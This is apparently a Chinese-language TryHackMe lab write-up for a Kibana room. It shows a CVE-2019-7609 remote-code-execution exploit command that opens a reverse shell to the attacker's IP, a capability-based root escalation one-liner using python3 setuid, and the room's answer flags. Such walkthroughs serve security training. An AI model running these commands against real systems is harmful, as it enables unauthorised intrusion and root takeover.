端口扫描

最近连thm的网络好像不太稳,nmap扫描也出了点问题。。。

Web

这界面和之前打的vulnhub那台好像,提示了cap的提权方式?

扫目录没扫出什么东西,80端口就是没什么东西

搜了一下5601端口,发现是一个叫做kibana的服务,和这个房间的名字挺符合,访问看一下

进了一个管理界面

先看房间的第一个问题

在这个界面找到版本号

Getshell

能直接搜到CVE

https://github.com/LandGrey/CVE-2019-7609

开启监听

python2 CVE-2019-7609-kibana-rce.py -u http://10.10.234.34:5601 -host 10.14.52.15 -port 1234 --shell

成功连接

user.txt

THM{1s_easy_pwn3d_k1bana_w1th_rce}

提权

既然房间都提示那么明显了,就是用cap文件来提权

getcap -r 来递归列举全部cap文件

但最好把报错信息丢弃

getcap -r / 2>/dev/null

能用python3,直接

/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

root.txt

THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es}

碎碎念

好简单的房间,没啥好说的233